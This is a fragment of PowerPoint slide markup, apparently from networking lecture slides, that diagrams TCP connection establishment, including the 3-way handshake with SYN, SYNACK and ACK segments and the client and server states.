              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36D5D9F3-A899-822C-66EC-F02537045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490" y="4953638"/>
            <a:ext cx="109523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choose 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" name="Line 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A018FE5D-6263-903C-5B75-AF39A007E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8653" y="5141789"/>
            <a:ext cx="1996343" cy="34350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3" name="Line 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C39E59-06B7-48E9-C791-A5FE94E7C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8677" y="5052029"/>
            <a:ext cx="0" cy="119104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4" name="Line 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEB6035F-1F91-EBC0-E456-FCB9A965BA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3564" y="5081373"/>
            <a:ext cx="0" cy="119104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5" name="Line 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0DB35FB-8351-C81A-B2D9-A9195709BC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4393" y="5573326"/>
            <a:ext cx="1996343" cy="34350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6" name="Rectangle 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B31DB448-760D-4A57-3D31-017243F5E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053" y="5126253"/>
            <a:ext cx="1049579" cy="3555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7" name="Text Box 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{996DF522-0FA1-62C3-98CF-DE615D56A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2290" y="5090004"/>
            <a:ext cx="14462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req_conn(x)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB589ADF-EDA4-A243-7F6A-EC085D4A0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957" y="5587135"/>
            <a:ext cx="593334" cy="3555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9" name="Text Box 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29DB8482-DD74-8CC3-D184-CB7C319F6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546" y="5381723"/>
            <a:ext cx="8418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ESTAB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A155ED-C4CE-3063-2284-DF6B96DA8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555" y="5744214"/>
            <a:ext cx="8418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ESTAB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Oval 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0143AED4-7E5B-0DE0-C1F8-F1570B29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560" y="5871949"/>
            <a:ext cx="122093" cy="96664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2" name="Oval 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B05B5802-665C-BBF6-AE63-CA8B1C194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304" y="5499101"/>
            <a:ext cx="122095" cy="96664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3" name="Rectangle 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E3EBDAF-CA19-8DA9-CAD0-1A0FD2B2C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261" y="5594040"/>
            <a:ext cx="1445850" cy="283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4" name="Text Box 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50764746-C2B7-6E52-ACE8-BF3CC2E16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404" y="5552612"/>
            <a:ext cx="14350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acc_conn(x)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0093179-B87D-5021-11EE-8214CAC46B9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1696017" y="4472044"/>
            <a:ext cx="775403" cy="566176"/>
            <a:chOff x="-44" y="1473"/>
            <a:chExt cx="981" cy="1105"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Picture 93" descr="desktop_computer_stylized_medium">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F147375-F46A-E508-4828-E3C60C9C9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94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{047FC5B3-7B7F-9CBF-76A8-5C846F3C0E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8" name="Group 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0E42CD4-A70E-2FC4-1F68-E36F11F2328F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4073636" y="4451330"/>
            <a:ext cx="318750" cy="557545"/>
            <a:chOff x="4140" y="429"/>
            <a:chExt cx="1425" cy="2396"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Freeform 96">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A85C23-E284-2EDD-5160-C63FAF2B2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Rectangle 97">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{152FF67F-1DF7-B7D8-1548-D187F7808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1" name="Freeform 98">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A05222B-98A1-BC54-2152-39DCA3F83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Freeform 99">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB7FA235-C81F-7807-3499-4BA39C664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Rectangle 100">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8376649C-D3C5-EDFF-B8AF-18011CABA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44" name="Group 101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA13C4D2-B23C-9DB0-5536-BF56685316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" name="AutoShape 102">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A8D3B71-408F-8F39-0345-C5439B9C6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0" name="AutoShape 103">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE9D531F-BA5B-F3E4-50AD-8A05D92D0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5" name="Rectangle 104">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D120280A-B089-0910-9700-44B50D678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46" name="Group 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{629C5C53-E015-1EBB-BFBD-0CC8075D49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7" name="AutoShape 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD593E7B-46D3-3E5B-A2E9-5FF3522D4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8" name="AutoShape 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7F19D6A-56C3-171B-008E-D33736920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7" name="Rectangle 108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE18C6C-5C47-AB9C-E784-2C7DA6A2B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8" name="Rectangle 109">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1475AA1C-31A7-85E0-F7D4-593A39DEB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49" name="Group 110">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCCBF41-0DC9-D15D-2380-FC2F2987F7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5" name="AutoShape 111">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB857BD0-3D5B-9CFF-C52B-4B5FCBBBA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" name="AutoShape 112">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82A32DDE-72EA-1B2E-A057-A082129A6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0" name="Freeform 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40353A93-E5D9-972F-78EE-3A7458F87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1" name="Group 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D996AAF7-A6D2-FBFA-0CB4-DFCFAD523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3" name="AutoShape 115">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5416756C-6A10-E700-6B73-06F7BFB9D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AutoShape 116">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FAE550C-C763-3225-EFF9-ADBA17CB5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2" name="Rectangle 117">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{353ECC8C-DECB-F989-2D9A-C7C8A88E2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3" name="Freeform 118">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C07D583-E1F1-C5C3-90BD-A0E80381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Freeform 119">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{408C1277-5447-B254-937E-8C3D14FA1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120">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E83DA38-9B51-6C67-6564-BE2519031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6" name="Freeform 121">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F72259F0-576D-F882-2042-71BEA001D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AutoShape 122">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E120BCB-A296-B50A-CFD8-74EA8BCE7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8" name="AutoShape 123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{601CF027-7989-6BBF-0EAD-FA5E7F18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9" name="Oval 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD12017D-2F98-E2FA-EF79-C71BC189E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0" name="Oval 125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6BD31EC-4264-DF07-9A2B-C6381A026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61" name="Oval 126">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71F2FAFD-5B99-3EE9-CABA-9580014FA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2" name="Rectangle 127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE17A2A9-0026-E6FD-46DF-9DBC99E2C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86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D9DD9D-9623-2C3A-77B4-0953F321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TCP 3-way handshake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56723-F70C-2790-ABDD-1A32D5097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90D11AE7-D1A4-48CF-0BC4-6F49B4FCA6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96631" y="3078661"/>
            <a:ext cx="1588" cy="2470150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6" name="Group 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{986BDBD5-2994-1F5B-15AF-89B4233079C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2810669" y="3005636"/>
            <a:ext cx="4494212" cy="955675"/>
            <a:chOff x="810" y="1363"/>
            <a:chExt cx="2831" cy="602"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Line 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{916A25CA-378B-CC1A-0243-625410A7B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" y="1502"/>
              <a:ext cx="1579" cy="46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FA6F7179-C1E7-60BE-3713-33122A557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" y="1565"/>
              <a:ext cx="590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" name="Text Box 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF055852-7CB5-5B38-F1C3-4B1516C71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0" y="1624"/>
              <a:ext cx="10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SYNbit=1, Seq=x</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Text Box 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BDA4D7D-D210-E827-3626-13BF5509F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" y="1363"/>
              <a:ext cx="1230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choose init seq num, x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 TCP SYN msg</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Line 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E06224EC-D67F-B471-83DF-3E24B2B9B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5844" y="3148511"/>
            <a:ext cx="1587" cy="3417888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92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA362B5-AABB-CB5B-9FC5-E6E40CAF6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1831" y="5986961"/>
            <a:ext cx="771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ESTAB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53480DEE-D229-A4AF-EA60-9C5CB33293AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4795044" y="3675561"/>
            <a:ext cx="4519612" cy="1425575"/>
            <a:chOff x="2060" y="1785"/>
            <a:chExt cx="2847" cy="898"/>
          </a:xfrm>
        </p:grpSpPr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40F46428-CD06-316E-32B3-A79FE032E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0" y="2031"/>
              <a:ext cx="1580" cy="65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2C98C6-EEB7-CEBD-6A95-E322A97B7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206"/>
              <a:ext cx="896" cy="3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" name="Text Box 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47B99E5D-07B1-8D89-F12A-A8BDA30A8B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9" y="2169"/>
              <a:ext cx="153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SYNbit=1, Seq=y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ACKbit=1; ACKnum=x+1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Text Box 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CF4EAFE-02CA-6117-F857-4D5132636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" y="1785"/>
              <a:ext cx="1231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choose init seq num, y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 TCP SYNACK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msg, acking SYN</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB40D81-9302-8A3D-9E63-18D0B131A6C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2512219" y="4774111"/>
            <a:ext cx="6630987" cy="1373188"/>
            <a:chOff x="622" y="2477"/>
            <a:chExt cx="4177" cy="865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Line 84">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00CE8900-E0AF-4962-5DFD-DF8C5E591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2728"/>
              <a:ext cx="1579" cy="46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" name="Rectangle 89">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE99A5D1-3E50-935D-C21F-6CB9D4FD3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2806"/>
              <a:ext cx="775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" name="Text Box 90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3AE45DA-DFA5-17B0-6A38-999E70DEA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2" y="2852"/>
              <a:ext cx="152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ACKbit=1, ACKnum=y+1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Text Box 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF440D1-5F69-06F6-813A-BB72B0C8D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" y="2477"/>
              <a:ext cx="1422" cy="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received SYNACK(x) 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indicates server is live;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 ACK for SYNACK;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this segment may contain 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client-to-server data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Text Box 95">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA32F68C-E326-8CDF-D8E8-DFAFD36E7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" y="3042"/>
              <a:ext cx="11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received ACK(y) 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indicates client is live</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C78F418-C2ED-A9FB-9A09-04718DC6E366}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1813719" y="3043736"/>
            <a:ext cx="1030287" cy="700088"/>
            <a:chOff x="182" y="1387"/>
            <a:chExt cx="649" cy="441"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Text Box 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{271DACAC-4539-8BF1-0F5B-9260F7769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1616"/>
              <a:ext cx="64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SYNSENT</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Line 103">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8051EC9F-DEA3-1D83-A62A-1863EE4442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1387"/>
              <a:ext cx="0" cy="2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7" name="Group 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B940F12-7131-1439-ACDE-7BC22C8EDDB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1815306" y="3704136"/>
            <a:ext cx="771525" cy="1622425"/>
            <a:chOff x="183" y="1803"/>
            <a:chExt cx="486" cy="1022"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Text Box 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABDA33EF-177B-5DDD-87AD-2AAFE4FE3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" y="2613"/>
              <a:ext cx="4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ESTAB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Line 104">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53921669-AB16-DB3E-511B-0DC1E66A7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" y="1803"/>
              <a:ext cx="0" cy="7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0" name="Group 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF80CBB9-F903-F88B-0882-63F7C2D1FD5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9268619" y="3099299"/>
            <a:ext cx="1119187" cy="1192212"/>
            <a:chOff x="4878" y="1422"/>
            <a:chExt cx="705" cy="751"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Text Box 99">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6D6191E-3CD7-7A6A-3ABA-E4038F8A9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8" y="1961"/>
              <a:ext cx="7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 RCVD</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Line 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF9DB6A0-0CAE-218A-A02D-6DA8B95503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9" y="1422"/>
              <a:ext cx="0" cy="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3" name="Line 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7D5A44D-E151-924E-3A31-4D186FA5AC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82994" y="4301036"/>
            <a:ext cx="0" cy="1704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4" name="Text Box 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D7F154-2207-DE7C-B9AD-CD87F259D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5197" y="1675748"/>
            <a:ext cx="183903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lient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state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5" name="Text Box 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B046965-F917-95F0-06C8-FE892DC86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7368" y="2389622"/>
            <a:ext cx="842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LISTEN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DF50DC8-EBBF-D136-5178-CA5157895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645" y="1081958"/>
            <a:ext cx="19304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erver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state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7" name="Text Box 117">
            <a:extLst>
